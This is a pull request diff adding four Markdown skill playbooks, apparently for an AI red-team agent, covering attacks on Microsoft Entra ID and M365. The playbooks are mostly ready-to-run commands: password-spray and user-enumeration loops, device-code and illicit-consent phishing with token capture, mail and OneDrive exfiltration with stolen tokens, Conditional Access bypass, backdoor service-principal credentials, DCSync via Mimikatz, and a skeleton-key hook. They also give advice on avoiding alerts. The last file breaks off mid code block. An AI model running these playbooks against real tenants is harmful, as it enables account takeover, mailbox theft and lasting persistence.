### PR TITLE
feat(skills): Azure Entra ID / M365 identity attack playbooks (enum, device-code phishing, CA bypass, privesc)

### DIFF
--- a/packages/decepticon/decepticon/skills/standard/cloud/entra-conditional-access-bypass/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/cloud/entra-conditional-access-bypass/SKILL.md
@@ -1,0 +1,149 @@
+---
+name: entra-conditional-access-bypass
+description: "Entra Conditional Access bypass — discover policy gaps, exploit legacy-auth protocols (IMAP/POP/SMTP-AUTH/EWS), spoof device/platform/UA/location conditions, abuse service-principals + app-based auth excluded from CA, and break-glass account misuse."
+allowed-tools: Bash Read Write
+metadata:
+  when_to_use: "conditional access ca bypass legacy auth basic auth imap pop smtp ews activesync device compliance trusted location user agent break glass service principal app auth mfa bypass"
+  subdomain: cloud
+  tags: azure, entra-id, conditional-access, mfa-bypass
+  mitre_attack: T1556, T1078.004, T1550.001, T1199
+---
+
+# Entra Conditional Access Bypass
+
+Conditional Access (CA) policies gate sign-ins by user/app/platform/location/device. Bypasses come from the **gaps** in policy scoping — legacy protocols not covered, service-principal flows out of scope, device/UA conditions spoofable, break-glass accounts excluded.
+
+## Phase 1: Enumerate the policy surface
+
+### Authenticated (Graph)
+```bash
+TOKEN=<GLOBAL_READER_OR_SECREADER>
+curl -s -H "Authorization: Bearer $TOKEN" \
+  "https://graph.microsoft.com/beta/policies/conditionalAccessPolicies" \
+  | jq '.value[] | {n:.displayName, st:.state, users:.conditions.users, apps:.conditions.applications, plat:.conditions.platforms, loc:.conditions.locations, ctrl:.grantControls}'
+```
+
+### Authenticated (roadrecon)
+```bash
+roadrecon plugin policies > capolicies.json
+# Look for: state=enabledForReportingButNotEnforced (audit-only), excludeUsers (BG accounts), excludeApplications, includeApplications missing 'All cloud apps'
+```
+
+### Unauth signals
+Sign-in failure error codes reveal CA:
+- `AADSTS53003` = blocked by Conditional Access — confirms a policy fired
+- `AADSTS50158` = external security challenge required (MFA-by-CA)
+- `AADSTS50053` = locked → smart-lockout, not CA
+- `AADSTS500011` = resource principal not found in tenant → app exclusion path
+- No `53003` across many protocols + locations → CA has gaps
+
+## Phase 2: Legacy auth bypass (basic auth survival)
+
+Despite "basic auth deprecation", many tenants still allow SMTP-AUTH; ROPC (Resource Owner Password Credentials) over `oauth2/token` is also frequently NOT covered by CA (CA gates `Browser` + `Modern auth clients`, but ROPC sneaks through if the policy doesn't include `Other clients`).
+
+### ROPC spray (no MFA prompt)
+```bash
+TARGET=<TARGET>; TENANT=<TENANT>
+for u in $(cat valid_users.txt); do
+  for p in $(cat pwlist.txt); do
+    r=$(curl -s -X POST "https://login.microsoftonline.com/${TENANT}/oauth2/token" \
+      -d "resource=https://graph.windows.net&client_id=1b730954-1685-4b74-9bfd-dac224a7b894&grant_type=password&username=${u}@${TARGET}&password=${p}")
+    if echo "$r" | jq -e .access_token >/dev/null; then echo "WIN: $u:$p"; break; fi
+    sleep $((RANDOM % 3 + 4))
+  done
+done
+```
+
+### SMTP-AUTH (Exchange Online)
+```bash
+# CA "block legacy auth" usually scopes 'Exchange ActiveSync' + 'Other clients' — verify SMTP submission:
+swaks --server smtp.office365.com:587 --tls --auth LOGIN \
+  --auth-user <UPN> --auth-password '<PW>' \
+  --from <UPN> --to <UPN> --header "Subject: t" --body t
+# 235 Authentication succeeded => SMTP-AUTH is alive ; tenant likely also lets ROPC through.
+```
+
+### IMAP / POP
+```bash
+openssl s_client -crlf -connect outlook.office365.com:993
+# A1 LOGIN <UPN> "<PW>"
+```
+
+### EWS / Autodiscover with NTLM-over-OAuth
+```bash
+# MailSniper (PS) — pulls mailboxes via EWS using OAuth token, skips CA on EWS-app if 'Office 365 Exchange Online' isn't in policy scope:
+Invoke-OpenInboxFinder -EmailList users.txt -ExchHostname outlook.office365.com -Verbose
+```
+
+## Phase 3: Device / platform spoofing
+
+CA "require compliant device" + "platform = Windows" rely on UA + `x-ms-DeviceType` headers — spoofable when the tenant lacks device certificate enforcement.
+
+```bash
+# Pretend to be a managed Windows client to bypass "block non-Windows":
+curl -s -X POST "https://login.microsoftonline.com/${TENANT}/oauth2/v2.0/token" \
+  -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Edge/120.0" \
+  -H "x-ms-PKeyAuth: 1.0" \
+  -d "client_id=29d9ed98-a469-4536-ade2-f981bc1d605e&grant_type=password&username=<UPN>&password=<PW>&scope=https://graph.microsoft.com/.default"
+# client_id 29d9ed98 = Microsoft Authentication Broker — often in CA exclusion.
+```
+
+PKeyAuth spoof — without the actual device cert, this only works against CAs that just check the *advertised* platform, not device compliance state (very common misconfig).
+
+### Trusted-location bypass
+```bash
+# Tunnel auth from a VPS in a trusted-IP range. List location named-ranges:
+curl -s -H "Authorization: Bearer $TOKEN" \
+  "https://graph.microsoft.com/v1.0/identity/conditionalAccess/namedLocations" | jq '.[]|{n:.displayName,r:.ipRanges}'
+# If a partner ASN is "trusted", any cloud VM in that ASN bypasses the geo control.
+```
+
+## Phase 4: Service-principal / app-based bypass
+
+CA historically scoped to USERS only. Workload Identity CA exists but is rarely enforced — service principals with `Application.ReadWrite.All` etc. authenticate as the app, no user, no MFA, no CA (unless `Workload Identity` CA is configured with `Sign-in risk` policies).
+
+```bash
+# If you have an app's client_id + secret/cert:
+curl -s -X POST "https://login.microsoftonline.com/${TENANT}/oauth2/v2.0/token" \
+  -d "client_id=<APP_ID>&client_secret=<SECRET>&grant_type=client_credentials&scope=https://graph.microsoft.com/.default"
+# This token has Application permissions — bypasses user-scoped CA entirely.
+```
+
+See `entra-privesc` § service-principal credential addition for how to mint that secret.
+
+## Phase 5: Break-glass account abuse
+
+Best practice: 2 BG accounts excluded from ALL CA + MFA, monitored by a SIEM alert. Reality: alert is misconfigured or the BG password is in a Confluence page / shared vault. Hunt:
+
+```bash
+# Find users excluded from MFA-enforcing policies:
+jq '.value[] | select(.grantControls.builtInControls | tostring | contains("mfa")) | .conditions.users.excludeUsers' capolicies.json | sort -u
+# UPNs of break-glass accounts. Search Confluence/SharePoint/git for those UPNs.
+```
+
+If BG creds are recovered → unrestricted Global Admin login from any IP, no MFA.
+
+## Chains
+- **`entra-enum` spray (no 53003) → ROPC password spray → mailbox** (CA gap on `Other clients`).
+- **Phished low-priv user with Application.ReadWrite.All → mint app cert → app-token bypasses all user CA** → tenant takeover.
+- **Discover BG account UPN → search internal wiki → unrestricted sign-in**.
+- **CA excludes `Microsoft Azure Management` for emergency cases → use that client_id for ARM ops while avoiding MFA**.
+
+## Tools
+- **MSOLSpray / TeamFiltration** — ROPC password spray with CA-aware error parsing.
+- **MailSniper** — EWS legacy-protocol pillage.
+- **AADInternals** `Invoke-AADIntPhoneSubscriberAuth` — Phone-Subscriber-Auth bypass (deprecated but still works in some tenants).
+- **roadtx** — arbitrary `client_id` + scope auth → CA-exclusion exploitation.
+- **swaks** — SMTP-AUTH probing.
+
+## Detection signatures
+- Sign-in log: `Client app = Other clients` with successful auth → ROPC/legacy auth survived.
+- Many `53003` failures from same IP → CA working; pivot away from that protocol/app combo.
+- Successful sign-in from break-glass account *without* a corresponding Sentinel alert → silent BG abuse.
+- App sign-in (`Service principal sign-ins` table) from non-corp IP → SP credential abuse — distinct table, often un-monitored.
+
+## Decision gate
+- All sign-ins return `53003` regardless of protocol → CA is tight; pivot to phishing (`entra-device-code-phishing`).
+- ROPC succeeds for `Microsoft Azure CLI` client_id but not browser → CA scoped to browser only — use CLI tokens for everything.
+- Found an excluded SP with `RoleManagement.ReadWrite.Directory` → escalate via `entra-privesc`.
+- BG account inventory hit → log in once from a sacrificial IP to verify no alert fires, then operate from that account.

--- a/packages/decepticon/decepticon/skills/standard/cloud/entra-device-code-phishing/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/cloud/entra-device-code-phishing/SKILL.md
@@ -1,0 +1,147 @@
+---
+name: entra-device-code-phishing
+description: "Entra ID OAuth device-code phishing for token theft, illicit consent grant via malicious app registration with delegated Graph scopes, refresh-token replay, and primary-refresh-token (PRT) abuse concepts."
+allowed-tools: Bash Read Write
+metadata:
+  when_to_use: "entra device code phishing oauth illicit consent malicious app registration delegated scopes refresh token replay prt primary refresh token tokentactics graphrunner"
+  subdomain: cloud
+  tags: azure, entra-id, phishing, oauth, token-theft
+  mitre_attack: T1528, T1566.002, T1078.004, T1550.001
+---
+
+# Entra Device-Code & Illicit-Consent Phishing
+
+Steal Entra ID tokens without ever owning the password. Two primary primitives:
+1. **Device-code phishing** — abuse the OAuth 2.0 device authorization grant: target enters YOUR code on the real MS login page.
+2. **Illicit consent grant** — register an app, get the user to consent to delegated Graph scopes.
+
+Both bypass MFA-at-login (the user already MFAd against the real IdP) and produce tokens with broad scope.
+
+## Phase 1: Device-code flow
+
+### Request the device code
+```bash
+# Use a first-party client ID (impersonate a Microsoft app — no consent prompt).
+# AzureCLI: 04b07795-8ddb-461a-bbee-02f9e1bf7b46
+# Teams:    1fec8e78-bce4-4aaf-ab1b-5451cc387264
+# Office:   d3590ed6-52b3-4102-aeff-aad2292ab01c
+CLIENT=04b07795-8ddb-461a-bbee-02f9e1bf7b46
+TENANT=<TENANT>     # or "common"
+resp=$(curl -s -X POST "https://login.microsoftonline.com/${TENANT}/oauth2/v2.0/devicecode" \
+  -d "client_id=${CLIENT}&scope=https://graph.microsoft.com/.default offline_access openid profile")
+echo "$resp" | jq .
+DEV_CODE=$(echo "$resp" | jq -r .device_code)
+USER_CODE=$(echo "$resp" | jq -r .user_code)
+echo "Send target to: https://microsoft.com/devicelogin  CODE: $USER_CODE"
+```
+
+### Pretext delivery
+Email / Teams message saying *"To join the secure briefing, open `microsoft.com/devicelogin` and enter code `<USER_CODE>`. Code expires in 15 minutes."* — the URL and brand are legitimate Microsoft, which makes it slip past most secure-email gateways.
+
+### Poll for the token
+```bash
+while :; do
+  r=$(curl -s -X POST "https://login.microsoftonline.com/${TENANT}/oauth2/v2.0/token" \
+    -d "grant_type=urn:ietf:params:oauth:grant-type:device_code&client_id=${CLIENT}&device_code=${DEV_CODE}")
+  err=$(echo "$r" | jq -r .error)
+  case "$err" in
+    authorization_pending) sleep 5 ;;
+    null) echo "$r" | jq . ; ACCESS=$(echo "$r" | jq -r .access_token); REFRESH=$(echo "$r" | jq -r .refresh_token); break ;;
+    *) echo "ERR: $err" ; break ;;
+  esac
+done
+```
+
+### Family-of-Client-IDs (FOCI) — single token, all Microsoft apps
+The above CLIENT is a FOCI app. Trade the refresh token for a token of ANY other FOCI app — no new consent:
+
+```bash
+# Swap to Outlook for mailbox access:
+curl -s -X POST "https://login.microsoftonline.com/${TENANT}/oauth2/v2.0/token" \
+  -d "client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c&grant_type=refresh_token&refresh_token=${REFRESH}&scope=https://outlook.office.com/.default offline_access"
+```
+
+`TokenTactics` / `TokenTacticsV2` (PowerShell) automates the swap matrix.
+
+## Phase 2: Illicit consent grant (malicious app)
+
+### Register the attacker app
+```bash
+# Register in YOUR attacker tenant (multi-tenant).
+# Redirect URI: https://<ATTACKER>/redirect  ; Sign-in audience: multi-tenant + personal MSA
+# Add delegated scopes (NO admin consent needed):
+#   Mail.Read, Mail.Send, Files.Read.All, offline_access, openid, profile
+# Capture App (client) ID = APP_ID
+APP_ID=<APP_ID>
+```
+
+### Craft the consent URL
+```bash
+SCOPES="https://graph.microsoft.com/Mail.Read https://graph.microsoft.com/Files.Read.All offline_access"
+REDIR=https://<ATTACKER>/redirect
+echo "https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=${APP_ID}&response_type=code&redirect_uri=${REDIR}&response_mode=query&scope=${SCOPES}&state=phish"
+```
+
+Brand the app `Contoso HR Portal` or similar; Microsoft renders YOUR app name on the consent screen. If the tenant has *user consent for low-risk delegated scopes* enabled (default in many tenants), the user single-clicks "Accept" and you have tokens.
+
+### Exchange code for tokens at your redirect
+```bash
+CODE=<CODE_FROM_REDIRECT>
+curl -s -X POST "https://login.microsoftonline.com/common/oauth2/v2.0/token" \
+  -d "client_id=${APP_ID}&grant_type=authorization_code&code=${CODE}&redirect_uri=${REDIR}&scope=${SCOPES}&client_secret=<APP_SECRET>" \
+  | jq .
+```
+
+## Phase 3: Token replay
+
+```bash
+# Mail exfil
+curl -s -H "Authorization: Bearer $ACCESS" \
+  "https://graph.microsoft.com/v1.0/me/messages?\$top=999" | jq .
+
+# OneDrive exfil
+curl -s -H "Authorization: Bearer $ACCESS" \
+  "https://graph.microsoft.com/v1.0/me/drive/root/search(q='password')" | jq .
+
+# Persist via refresh token (90-day inactive TTL on consumer, 14-day default on CA-protected tenants)
+curl -s -X POST "https://login.microsoftonline.com/common/oauth2/v2.0/token" \
+  -d "client_id=${APP_ID}&grant_type=refresh_token&refresh_token=${REFRESH}&scope=${SCOPES}"
+```
+
+## Phase 4: Primary Refresh Token (PRT) concepts
+
+A PRT is the long-lived token issued to an Entra-joined / Entra-registered Windows device. It is bound to a device key in the TPM. With SYSTEM on the device:
+
+```powershell
+# ROADtools roadtx (post-exploitation, requires local SYSTEM):
+roadtx prt -u <UPN>            # extract PRT cookie via BrowserCore
+roadtx browserprtauth          # use PRT to silently auth as the user → tokens for any FOCI app
+# Or: Lee Christensen / Dirk-jan PoCs — request PRT + session key, mint x-ms-RefreshTokenCredential cookie.
+```
+
+A stolen PRT effectively == user identity until device revocation. Even MFA isn't re-prompted (PRT already carries MFA claim).
+
+## Chains
+- **Device-code phish → FOCI swap → Outlook + OneDrive exfil → Teams pretext → second victim**.
+- **Illicit consent → Mail.Send delegated → internal phishing FROM victim mailbox** (BEC).
+- **Device-code phish on admin → Graph privesc** (see `entra-privesc` § service-principal credential addition).
+- **PRT theft (post-RCE on joined endpoint) → app tokens forever** (until device disabled).
+
+## Tools
+- **TokenTactics / TokenTacticsV2** (Steve Borosh) — PowerShell device-code + FOCI swap.
+- **GraphRunner** (Beau Bullock) — pull mail/files/teams from a stolen token; pivot via consent.
+- **roadtx** (ROADtools) — full device-code + PRT support.
+- **365-Stealer** — illicit-consent automation.
+- **o365 attack toolkit / Evilginx Microsoft phishlet** — alternative path (full MitM).
+
+## Detection signatures
+- Entra Sign-in log: `Application = Microsoft Authentication Broker` or `Microsoft Azure CLI` from unusual ASN/country = device-code abuse hallmark.
+- Audit log: `Consent to application` event with `ConsentType=User` + `Scopes` containing `Mail.Read/Files.Read.All` from a non-IT identity.
+- MS Defender for Cloud Apps `Unusual addition of credentials to an OAuth app` alert.
+- Risky sign-in: `unfamiliarFeatures` + `anonymousIP` triggered by token replay from Tor/VPS.
+
+## Decision gate
+- CA blocks unmanaged devices → use FOCI swap to a client whose CA exclusion (`Microsoft Intune Enrollment`) is wider.
+- Tenant has `User consent disabled` → only admin-consent path → social-engineer a Global Admin or pre-existing app-owner.
+- Got Global Admin via consent? Pivot to `entra-privesc` for app-credential persistence (survives password reset).
+- Got mailbox tokens only? Run BEC playbook via Mail.Send before refresh token expires.

--- a/packages/decepticon/decepticon/skills/standard/cloud/entra-enum/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/cloud/entra-enum/SKILL.md
@@ -1,0 +1,156 @@
+---
+name: entra-enum
+description: "Entra ID / M365 reconnaissance — unauthenticated tenant discovery via OpenID config, GetUserRealm, autodiscover; user enumeration via login response codes and OneDrive; federation/MFA/CA posture; authenticated enumeration with ROADtools (roadrecon), AADInternals, MSGraph."
+allowed-tools: Bash Read Write
+metadata:
+  when_to_use: "entra azure ad aad m365 office365 tenant discovery user enumeration onedrive getuserrealm openid federation roadrecon roadtools aadinternals graph conditional access mfa posture recon"
+  subdomain: cloud
+  tags: azure, entra-id, m365, recon, enumeration
+  mitre_attack: T1087.004, T1589.002, T1526, T1078.004
+---
+
+# Entra ID / M365 Enumeration
+
+You have a target domain (e.g. `<TARGET>`) and want to map the Entra ID tenant before any auth attempt. Tenant ID, validated users, federation type, MFA/CA posture — all reachable unauth. Then layer authenticated recon once you have a token.
+
+## Phase 0: Tenant discovery (unauth)
+
+```bash
+TARGET=<TARGET>           # e.g. contoso.com
+# 1. OpenID config — tenant ID + auth endpoints
+curl -s "https://login.microsoftonline.com/${TARGET}/.well-known/openid-configuration" | jq '{tenant: .issuer, authz: .authorization_endpoint, token: .token_endpoint}'
+
+# 2. GetUserRealm — federation type (Managed | Federated | Unknown)
+curl -s "https://login.microsoftonline.com/getuserrealm.srf?login=any@${TARGET}&xml=1"
+
+# 3. Autodiscover — federated IdP hint (ADFS, Okta, PingFed)
+curl -s "https://autodiscover-s.outlook.com/autodiscover/autodiscover.svc" \
+  -H "Content-Type: text/xml; charset=utf-8" \
+  -H "SOAPAction: \"http://schemas.microsoft.com/exchange/2010/Autodiscover/Autodiscover/GetFederationInformation\"" \
+  -d @- <<XML | xmllint --format -
+<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:a="http://schemas.microsoft.com/exchange/2010/Autodiscover">
+  <soap:Header><a:RequestedServerVersion>Exchange2010</a:RequestedServerVersion></soap:Header>
+  <soap:Body><a:GetFederationInformationRequestMessage><a:Request><a:Domain>${TARGET}</a:Domain></a:Request></a:GetFederationInformationRequestMessage></soap:Body>
+</soap:Envelope>
+XML
+
+# 4. Tenant branding (logo, banner string => social-engineering pretext)
+curl -sI "https://login.microsoftonline.com/${TARGET}/v2.0/.well-known/openid-configuration"
+```
+
+Pull tenant ID into env:
+```bash
+TENANT=$(curl -s "https://login.microsoftonline.com/${TARGET}/.well-known/openid-configuration" | jq -r .issuer | awk -F/ '{print $4}')
+echo "$TENANT"   # GUID
+```
+
+## Phase 1: User enumeration (unauth)
+
+### o365creeper — login endpoint response codes
+```bash
+# AADSTS50053 = locked, AADSTS50034 = user doesn't exist, AADSTS50126 = wrong pw (= valid user)
+curl -s -X POST "https://login.microsoftonline.com/common/oauth2/token" \
+  -d "resource=https://graph.windows.net&client_id=1b730954-1685-4b74-9bfd-dac224a7b894&grant_type=password&username=<UPN>&password=Invalid!" \
+  -d "scope=openid" | jq -r .error_description
+```
+
+Drive it from a list:
+```bash
+for u in $(cat users.txt); do
+  err=$(curl -s -X POST "https://login.microsoftonline.com/common/oauth2/token" \
+    -d "resource=https://graph.windows.net&client_id=1b730954-1685-4b74-9bfd-dac224a7b894&grant_type=password&username=${u}@${TARGET}&password=NotReal_$(date +%s)!" \
+    | jq -r .error_description | awk '{print $1}')
+  case "$err" in AADSTS50126|AADSTS50053|AADSTS50079|AADSTS50076) echo "VALID: $u" ;; esac
+  sleep $((RANDOM % 3 + 2))
+done
+```
+
+### OneDrive enumeration (no auth, no rate-limit log)
+```bash
+# Domain prefix derived from primary domain — `contoso.com` -> `contoso`
+TENANT_PREFIX=<PREFIX>
+curl -s -o /dev/null -w "%{http_code} ${u}\n" \
+  "https://${TENANT_PREFIX}-my.sharepoint.com/personal/${u}_${TARGET//./_}/_layouts/15/onedrive.aspx"
+# 403 => user exists, 404 => doesn't. Zero auth events generated.
+```
+
+### Teams presence (authenticated, but very low-noise)
+```bash
+# With any tenant token:
+curl -s -H "Authorization: Bearer $TOKEN" \
+  "https://presence.teams.microsoft.com/v1/presence/getpresence/" \
+  -d '{"mris":["8:orgid:<USER_GUID>"]}'
+```
+
+## Phase 2: Federation + MFA posture
+
+```bash
+# Managed vs Federated
+curl -s "https://login.microsoftonline.com/getuserrealm.srf?login=test@${TARGET}&xml=1" | grep -oE '<NameSpaceType>[^<]+'
+
+# If Federated => target the IdP (ADFS endpoints exposed):
+curl -s "https://login.microsoftonline.com/getuserrealm.srf?login=test@${TARGET}&xml=1" | grep -oE '<STSAuthURL>[^<]+'
+
+# Seamless SSO probe (DesktopSso) — presence of /DesktopSsoAuth indicates SSO
+curl -sI "https://autologon.microsoftazuread-sso.com/${TARGET}/winauth/trust/2005/usernamemixed?client-request-id=<GUID>"
+```
+
+## Phase 3: Authenticated enumeration
+
+### roadrecon (ROADtools)
+```bash
+pipx install roadtools
+roadrecon auth -u <UPN> -p '<PASSWORD>'                  # device-code: roadrecon auth --device-code
+roadrecon gather                                          # pulls users/groups/apps/roles/devices/CAs
+roadrecon dump --format json --file roadrecon.json
+roadrecon gui                                             # graph-aware browser
+```
+
+Targeted Cypher-like queries via `roadrecon plugin`:
+```bash
+roadrecon plugin policies   # ALL conditional access policies (raw JSON)
+roadrecon plugin privexch   # high-priv mailbox roles
+```
+
+### AADInternals (PowerShell — fewer Graph audit events)
+```powershell
+Install-Module AADInternals -Force
+$at = Get-AADIntAccessTokenForAADGraph -SaveToCache
+Get-AADIntTenantDomains -Domain <TARGET>
+Get-AADIntLoginInformation -Domain <TARGET>
+Get-AADIntUsers | Select UserPrincipalName,DisplayName,immutableId
+Invoke-AADIntReconAsOutsider -DomainName <TARGET>     # 100% unauth
+Invoke-AADIntUserEnumerationAsOutsider -UserName users.txt
+```
+
+### MSGraph direct
+```bash
+curl -s -H "Authorization: Bearer $TOKEN" "https://graph.microsoft.com/v1.0/users?\$select=userPrincipalName,id,onPremisesSyncEnabled" | jq .
+curl -s -H "Authorization: Bearer $TOKEN" "https://graph.microsoft.com/v1.0/directoryRoles" | jq '.value[]|.displayName'
+curl -s -H "Authorization: Bearer $TOKEN" "https://graph.microsoft.com/beta/policies/conditionalAccessPolicies" | jq '.value[]|{n:.displayName,s:.state}'
+```
+
+## Chains
+- **Tenant discovery → user spray → password-spray** (rate-limited; pair with `entra-conditional-access-bypass` for legacy-auth endpoints).
+- **Federation discovery → ADFS target** (Golden SAML — see `entra-privesc`).
+- **OneDrive enum (silent) → device-code phish** (see `entra-device-code-phishing`).
+- **`onPremisesSyncEnabled=true` → hybrid identity hunt** → AAD Connect server.
+
+## Tools
+- **ROADtools / roadrecon** — primary authenticated enum (Dirk-jan Mollema).
+- **AADInternals** — PowerShell, deep AAD internals, both unauth + auth modes.
+- **o365creeper / MailSniper / MSOLSpray** — user enumeration + spray.
+- **TeamFiltration** — combined enum/spray/exfil from M365.
+- **GraphRunner** — auth Graph operator UI.
+
+## Detection signatures
+- Sign-in logs: high volume of `50034` (unknown user) followed by `50126` => spray reconnaissance.
+- Repeated `getuserrealm.srf` from one IP is invisible to tenants — not logged.
+- OneDrive `403` ping pattern is also unlogged at the tenant — assume zero detection.
+- `roadrecon gather` produces ~30s burst of Graph queries from one IP — show up in audit log as `Microsoft.Graph` reads from non-corp ASN.
+
+## Decision gate
+- Federation == Federated → pivot to ADFS / IdP attacks; Golden SAML viable if you own the IdP host.
+- Federation == Managed and CA blocks legacy → escalate to device-code phishing.
+- `onPremisesSyncEnabled=true` on most users → hybrid env → hunt AAD Connect / `azure-managed-identity` MSOL extraction.
+- No CA on legacy auth → spray IMAP/POP/SMTP-AUTH (see `entra-conditional-access-bypass`).

--- a/packages/decepticon/decepticon/skills/standard/cloud/entra-privesc/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/cloud/entra-privesc/SKILL.md
@@ -1,0 +1,201 @@
+---
+name: entra-privesc
+description: "Entra ID privilege escalation + persistence — app role/owner abuse, service-principal credential addition, dynamic group membership abuse, Administrative Unit role assignment, hybrid identity attacks (Connect, PHS, PTA, Seamless SSO, Golden SAML), Graph API privesc paths."
+allowed-tools: Bash Read Write
+metadata:
+  when_to_use: "entra azure ad privilege escalation persistence app owner service principal credential addition dynamic group administrative unit hybrid aad connect phs pta seamless sso golden saml graph api privesc"
+  subdomain: cloud
+  tags: azure, entra-id, privesc, persistence, hybrid-identity
+  mitre_attack: T1098, T1098.001, T1098.003, T1556.007, T1606.002, T1078.004
+---
+
+# Entra Privilege Escalation & Persistence
+
+You have a token with non-trivial permissions in Entra ID. Walk the escalation graph to Global Admin / org takeover, then plant persistence that survives password resets.
+
+## Phase 0: Map current privileges
+
+```bash
+TOKEN=<MS_GRAPH_TOKEN>
+# Roles I directly hold
+curl -s -H "Authorization: Bearer $TOKEN" \
+  "https://graph.microsoft.com/v1.0/me/memberOf?\$select=displayName,roleTemplateId" | jq .
+
+# Apps I OWN (owners can mint credentials)
+curl -s -H "Authorization: Bearer $TOKEN" \
+  "https://graph.microsoft.com/v1.0/me/ownedObjects" | jq '.value[]|{type:.["@odata.type"],id,name:.displayName}'
+
+# Groups where I'm an owner (can add members)
+curl -s -H "Authorization: Bearer $TOKEN" \
+  "https://graph.microsoft.com/v1.0/me/ownedObjects?\$filter=isof('microsoft.graph.group')"
+```
+
+## Phase 1: App role / app owner abuse
+
+### Owner → credential addition → app's directory roles
+```bash
+APP_OBJ=<APP_OBJECT_ID>     # not appId — objectId of the Application
+# Mint a 2-year client secret on an app you OWN:
+curl -s -X POST -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" \
+  "https://graph.microsoft.com/v1.0/applications/${APP_OBJ}/addPassword" \
+  -d '{"passwordCredential":{"displayName":"backup-cred","endDateTime":"2027-01-01T00:00:00Z"}}'
+# Returned secretText -> auth as the service principal:
+curl -s -X POST "https://login.microsoftonline.com/<TENANT>/oauth2/v2.0/token" \
+  -d "client_id=<APP_ID>&client_secret=<SECRET>&grant_type=client_credentials&scope=https://graph.microsoft.com/.default"
+```
+
+If the target SP has any of these app roles, you have GA-equivalent:
+- `RoleManagement.ReadWrite.Directory`
+- `Application.ReadWrite.All`
+- `AppRoleAssignment.ReadWrite.All`
+- `Directory.ReadWrite.All` (limited but powerful)
+
+### Adding a high-priv app role to your SP
+```bash
+# Find the Microsoft Graph SP objectId and the role:
+GRAPH_SP=$(curl -s -H "Authorization: Bearer $TOKEN" \
+  "https://graph.microsoft.com/v1.0/servicePrincipals?\$filter=appId eq '00000003-0000-0000-c000-000000000000'" | jq -r '.value[0].id')
+ROLE_ID=$(curl -s -H "Authorization: Bearer $TOKEN" \
+  "https://graph.microsoft.com/v1.0/servicePrincipals/${GRAPH_SP}" \
+  | jq -r '.appRoles[]|select(.value=="RoleManagement.ReadWrite.Directory").id')
+# Grant the role to your SP (requires Application.ReadWrite.All today):
+curl -s -X POST -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" \
+  "https://graph.microsoft.com/v1.0/servicePrincipals/<MY_SP>/appRoleAssignments" \
+  -d "{\"principalId\":\"<MY_SP>\",\"resourceId\":\"${GRAPH_SP}\",\"appRoleId\":\"${ROLE_ID}\"}"
+```
+
+## Phase 2: Service principal credential addition (persistence)
+
+Existing SP with high privs (e.g. tenant-installed Microsoft 365 management app) → add a credential. Survives the original user's password reset.
+
+```bash
+SP_ID=<TARGET_SP_OBJECT_ID>
+curl -s -X POST -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" \
+  "https://graph.microsoft.com/v1.0/servicePrincipals/${SP_ID}/addPassword" \
+  -d '{"passwordCredential":{"displayName":"cert-rotation","endDateTime":"2027-12-31T00:00:00Z"}}'
+# Auth as that SP indefinitely.
+```
+
+Certificate variant (less audited than secrets):
+```bash
+openssl req -newkey rsa:2048 -nodes -keyout k.pem -x509 -days 730 -out c.pem -subj "/CN=evt"
+CERT_B64=$(openssl x509 -in c.pem -outform DER | base64 -w0)
+curl -s -X POST -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" \
+  "https://graph.microsoft.com/v1.0/servicePrincipals/${SP_ID}/addKey" \
+  -d "{\"keyCredential\":{\"type\":\"AsymmetricX509Cert\",\"usage\":\"Verify\",\"key\":\"${CERT_B64}\"}}"
+```
+
+## Phase 3: Dynamic group abuse
+
+Dynamic groups grant role membership based on user attributes. Some attributes are user-editable (e.g. `otherMails`, `state`, `department`).
+
+```bash
+# Find dynamic groups bound to privileged roles:
+curl -s -H "Authorization: Bearer $TOKEN" \
+  "https://graph.microsoft.com/v1.0/groups?\$filter=groupTypes/any(c:c eq 'DynamicMembership')" \
+  | jq '.value[]|{n:.displayName,rule:.membershipRule}'
+# Look for: (user.otherMails -contains "admin@") or (user.department -eq "IT")
+# If you control any "self-service" attribute that matches the rule, write it:
+curl -s -X PATCH -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" \
+  "https://graph.microsoft.com/v1.0/me" \
+  -d '{"otherMails":["admin@<TARGET>"]}'
+# Recompute happens automatically; you land in the privileged group within minutes.
+```
+
+## Phase 4: Administrative Unit (AU) abuse
+
+AU-scoped admins (e.g. `User Administrator` over `Sales AU`) can reset passwords for users in that AU — including any user whose group/role is itself AU-administered. Chains:
+
+```bash
+# List AUs and their scoped role assignments:
+curl -s -H "Authorization: Bearer $TOKEN" \
+  "https://graph.microsoft.com/beta/directory/administrativeUnits?\$expand=members" | jq .
+curl -s -H "Authorization: Bearer $TOKEN" \
+  "https://graph.microsoft.com/beta/roleManagement/directory/roleAssignments?\$filter=directoryScopeId ne '/'" | jq .
+# AU UserAdmin → reset password of an AU-member who is a global Application Administrator → mint SP cred → Graph privesc.
+```
+
+## Phase 5: Hybrid identity attacks
+
+### AAD Connect → MSOL DCSync
+On the AAD Connect server (Windows): the `MSOL_xxxxxxx` account has DCSync rights on the on-prem domain. Extract via AADInternals:
+
+```powershell
+# As SYSTEM on AAD Connect host:
+Get-AADIntSyncCredentials       # exposes MSOL plaintext password + Sync_xxx cloud account
+# Then on-prem DCSync:
+Invoke-Mimikatz -Command '"lsadump::dcsync /domain:<DOMAIN> /user:krbtgt"'
+```
+
+### Pass-Through Authentication (PTA) skeleton key
+PTA agent installed on a server validates passwords against on-prem AD. Hooking the agent's `AzureADConnectAuthenticationAgentService.exe` → accept any password for any user:
+
+```powershell
+Install-AADIntPTASpy             # AADInternals — DLL inject; logs all PTA creds + accepts any password
+```
+
+Detected by AV but trivial PoC for environments without EDR on AAD Connect host.
+
+### Password Hash Sync (PHS) abuse
+With cloud-side `Sync_<tenant>` account creds (extractable by Get-AADIntSyncCredentials), inject arbitrary NTLM hashes for cloud-only users:
+
+```powershell
